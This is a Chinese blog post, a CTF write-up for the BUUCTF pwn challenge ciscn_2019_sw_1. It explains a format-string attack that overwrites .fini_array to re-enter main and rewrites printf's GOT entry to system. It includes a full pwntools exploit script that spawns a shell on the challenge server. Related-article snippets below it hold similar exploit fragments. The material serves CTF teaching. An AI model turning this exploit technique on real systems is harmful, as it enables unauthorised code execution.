ciscn_2019_sw_1(fmt改fini_array无限循环)

最新推荐文章于 2024-04-11 20:11:47 发布
最新推荐文章于 2024-04-11 20:11:47 发布
阅读量1.4k 收藏 1
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wuyvle/article/details/116310454
版权

格式化字符串漏洞 .fini_array 代码执行 payload 逆向工程
关键词由CSDN通过智能技术生成

在这里插入图片描述很明显的格式化漏洞,但是printf只能用一次
我们可以修改fini_array
在这里插入图片描述简单地说,在main函数前会调用.init段代码和.init_array段的函数数组中每一个函数指针。同样的,main函数结束后也会调用.fini段代码和.fini._arrary段的函数数组中的每一个函数指针。
而我们的目标就是修改.fini_array数组的第一个元素为start或者main函数地址。需要注意的是,这个数组的内容在再次从start开始执行后又会被修改,且程序可读取的字节数有限,因此需要一次性修改两个地址并且合理调整payload。
两种方法

# coding=utf-8
from pwn import *

io = remote("node3.buuoj.cn",25567)
#io = process("./ciscn_2019_sw_1")
elf = ELF("./ciscn_2019_sw_1")

printf_got = elf.got["printf"] 
system_plt = elf.plt["system"] #080483D0
fini_array = 0x0804979C
main_addr = elf.symbols["main"] #0x8048534

#写法一,参考大佬的
#payload = p32(fini_array) + p32(fini_array + 2) + p32(printf_got+2) + p32(printf_got)
#payload += "%" + str(0x8534 - 0x10) + "c%4$hn"
#payload += "%" + str(0x10804 - (0x8534)) + "c%5$hn"
#payload += "%" + str(0x183D0 - 0x10804) + "c%6$hn"
#payload += "%" + str(0x20804 - 0x183D0) + "c%7$hn"

#写法二,按顺序改
payload = p32(fini_array + 2) + p32(printf_got+2) + p32(printf_got) + p32(fini_array)
payload += "%" + str(0x0804 - 0x10) + "c%4$hn"    #0804 
payload += "%5$hn"                                #0804 
payload += "%" + str(0x83D0 - 0x0804) + "c%6$hn"  #83D0
payload += "%" + str(0x8534 - 0x83D0) + "c%7$hn"  #8534

io.recvuntil("name?\n")
io.sendline(payload)
io.recvuntil("name?\n")
io.sendline("/bin/sh\x00")

io.interactive()

其它还好,就是改值有点麻烦;
首先时fini的地址改成0x8048534
分两次:0x8534 0x804
第一次0x8534=34084+4*4
第二次由于肯定大于0x804所以想办法变成0x10804,这样写的也还是0x0804,
所以0x10804=0x8534+33488
后面同理

w0nderMaker
关注
__fini_array劫持
qq_36495104的博客
08-30 1121
3×17-x64静态编译程序的fini_array劫持 参考 pwnable.tw新手向write up(二) 3×17-x64静态编译程序的fini_array劫持 pwnable.tw 3x17 1 劫持fini_array,循环写 劫持fini_array[1]为main函数地址,fini_array[0]为__libc_csu_fini,将长度为18的任意地址写升级为长度无限制的任意地址写 2 栈迁移,构造ROP chain 在0x4b40f0+0x10地址处构造ROP chain ROP ch
CISCN2019 华北赛区 Day2 Web1
kid的博客
09-09 1680
CISCN2019 华北赛区 Day2 Web1 前言 最近太懒一直没有怎么学习,今天把《轮到你了》结局看了也极为失望,作为黑岛的舔狗我决定好好刷题提高自己,不然都没有实力去当舔???? (当好舔????真不容易) 打开大佬的博客发现好多新的题和环境…好吧,一道一道来吧 感谢大佬提供的环境:https://github.com/glzjin/CISCN_2019_northern_China_day2_we...
BUUCTF之“ciscn_2019_sw_1”
Probeginner的博客
12-26 709
通过fmtfini_array为main,更加深入理解程序执行
[BUUCTF-pwn]——ciscn_2019_sw_1
Y_peak的博客
04-03 497
[BUUCTF-pwn]——ciscn_2019_sw_1 一个简单的格式化字符串, 相信大家看到旁边 的system和格式化字符串漏洞,想的一定是利用格式化字符串漏洞将printf_got表修system_plt表,然后使其循环调用main第二次输入’/bin/sh’就好 可能唯一需要说一下的就是, 程序结束时会调用_fini_array指向的函数指针,所以我们将其修为mian就会循环调用了 算下偏移, 一看就是4 exploit from pwn import * p = remote("no
ciscn_2019_sw_1
z1r0的博客
02-21 736
ciscn_2019_sw_1 查看保护 这里有一个格式化漏洞,但是呢这里只能一次。这里学到了一个新姿势在程序结束的时候有一个fini.array段运行。这时将 fini.array[0]的地址为main函数地址这样就可以运行两次了。这样的话printf为system之后第二次传入bin/sh即可getshell。 from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0'
BUUCTF axb_2019_fmt32
BengDouLove的博客
04-16 1555
主程序就是这样的,能看到有一个printf的格式化字符串漏洞 sprintf 相当于把参数替换了之后的格式化字符串送入了第一个参数,也就是format 首先,没有后门也没有系统函数,要用格式化字符串泄露出牟哥libc函数,来获得libc基址 然后,仔细算一下 s 和 format 两个参数,都没有溢出,,也没有函数能写进got表,,所以还是再次利用格式化字符串漏洞通过%n来写入数据 先看...
AV_SAMPLE_FMT_FLTP转为AV_SAMPLE_FMT_S16P(ffmpeg)
03-09
AV_SAMPLE_FMT_FLTP转为AV_SAMPLE_FMT_S16P(ffmpeg),在使用ffmpeg解码aac的时候,如果使用avcodec_decode_audio4函数解码,那么解码出来的会是AV_SAMPLE_FMT_FLTP 格式的数据( float, 4bit , planar), 如果我们希望...
ffmpeg使用scale_npp进行AV_PIX_FMT_CUDA到AV_PIX_FMT_YUV420P的转换
我的博客
10-24 1709
ffmpeg中的filter使用及scale_npp转码cuda到BGR的示例代码
python中的array数组_详解Python中的array数组模块相关使用
weixin_42287030的博客
12-28 2677
数组并不是Python中内置的标配数据结构,不过拥有array模块我们也可以在Python中使用数组结构,下面我们就来详解详解Python中的array数组模块相关使用>>> import array#定义了一种序列数据结构>>> help(array)#创建数组,相当于初始化一个数组,如:d={},k=[]等等array(typecode [, initial...
ciscn_2019_sw_1(fmt劫持fini_array为main,获得一次循环)
m0_51251108的博客
11-13 591
ciscn_2019_sw_1: 主要参考这位师傅:https://www.cnblogs.com/LynneHuan/p/14660529.html#%E7%9F%A5%E8%AF%86%E7%82%B9 先引用下: 当RELRO保护为NO RELRO的时候,init.array、fini.array、got.plt均可读可写; 为PARTIAL RELRO的时候,ini.array、fini.array可读不可写,got.plt可读可写; 为FULL RELRO时,init.array
Ciscn_2019_sw1<fini_array
m0_55906008的博客
09-22 171
​ 在执行main函数之前会调用init_array里的函数,在执行完main函数之后调用fini_array里的函数,因此这道题思路为通过第一次printf劫持printf的got表为system的函数地址,劫持fini_addr为main函数的地址,第二次输入"/bin/sh\x00",当执行到printf(“/bin/sh\x00”)时,由于劫持为system函数,因此执行system(“/bin/sh\x00”),拿到shell。
ciscn_2019_sw_1 Writeup
Calllin的博客
05-11 497
前提 RELRO防御策略是当RELRO保护: 为NO RELRO的时候,init.array、fini.array、got.plt均可读可写 为PARTIAL RELRO的时候,ini.array、fini.array可读不可写,got.plt可读可写 为FULL RELRO时,init.array、fini.array、got.plt均可读不可写。 linux程序运行时: 在加载的时候,会依次调用init.array数组中的每一个函数指针 在结束的时候,依次调用fini.array中的每一个函数
ciscn_2019_s_1
doudoudedi
06-29 764
思路 通过off by null写key值然后unlink写bss段再次double free写free_hook即可拿到shell exp: from pwn import * #p=process('./ciscn_s_1') p=remote('node3.buuoj.cn',26429) elf=ELF('./ciscn_s_1') libc=elf.libc def add(idx,size,data): p.sendlineafter('show','1') p.sendlineafte
CISCN 2019西南 PWN1 之.fini_array利用
qq_60209620的博客
04-11 394
数组中存在一些函数指针,程序在退出时,会调用这些指针,所以我们可以修数组内容,可以达到控制程序的执行流。本题主要是因为我们只能执行一次格式化字符串,,没办法在一次执行中拿到shell,所以可以利用劫持数组,使程序再次执行main函数。用查看。
64位静态编译程序的fini_array劫持及ROP攻击
Vantler的博客
03-02 542
详解64位静态编译程序的fini_array劫持及ROP攻击:https://www.freebuf.com/articles/system/226003.html 如果劫持后可实现可控函数循环执行的目的,那是不是可以用来安装持续监听的后门? ...
【八芒星计划】静态编译劫持fini_array
carol2358的博客
09-05 473
引用: https://www.freebuf.com/articles/system/226003.html https://bbs.pediy.com/thread-259298.htm 文章目录前言一、Memory Monster II总结 前言 直接先说使用方法: fini_array[1]放想要调用的地址addrA,fini_array[0]放__libc_csu_fini的地址,就可以无限调用addrA 也可以用来栈迁移 fini_array[0]放leave,ret,fini_array
关于 .init .fini .init_array .fini_array 日志 7.16 pwn
RobinZZX的博客
07-16 3193
查找资料的高效性 retn 返回到栈顶地址 关于 .init .fini .init_array .fini_array 其中存放着的是在main函数执行前执行的代码,由__libc_start_main调用,(__libc_start_main在libc.so上,所以先有start()调用__libc_start_main,再调用init段的代码)在这段代码中就有我们经常使用的libc_csu的...
通过利用fini_array部署并启动ROP攻击 | TaQini
HiTaQini
05-08 1401
这篇文章源自pwnable.tw上的一道题目3x17,其中用到了fini_array劫持,比较有意思,于是写篇文章分析记录总结一下关于fini_array的利用方式~
lv_label_set_text_fmt参数说明
最新发布
04-26
lv_label_set_text_fmt是LittlevGL库中用于设置标签(Label)文本的函数,它可以根据格式化字符串设置标签的文本内容。该函数的参数说明如下: 1. label:要设置文本的标签对象。 2. fmt:格式化字符串,用于指定文本的格式和内容。 3. ...:可变参数列表,用于替换格式化字符串中的占位符。 格式化字符串中的占位符可以使用类似于printf函数的格式化规则,常见的占位符包括: - %d:整数类型 - %f:浮点数类型 - %s:字符串类型 - %c:字符类型 示例代码如下: ``` lv_label_set_text_fmt(label, "Hello, %s! Today is %dth day.", "John", 10); ``` 上述代码将会将标签的文本设置为"Hello, John! Today is 10th day."。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值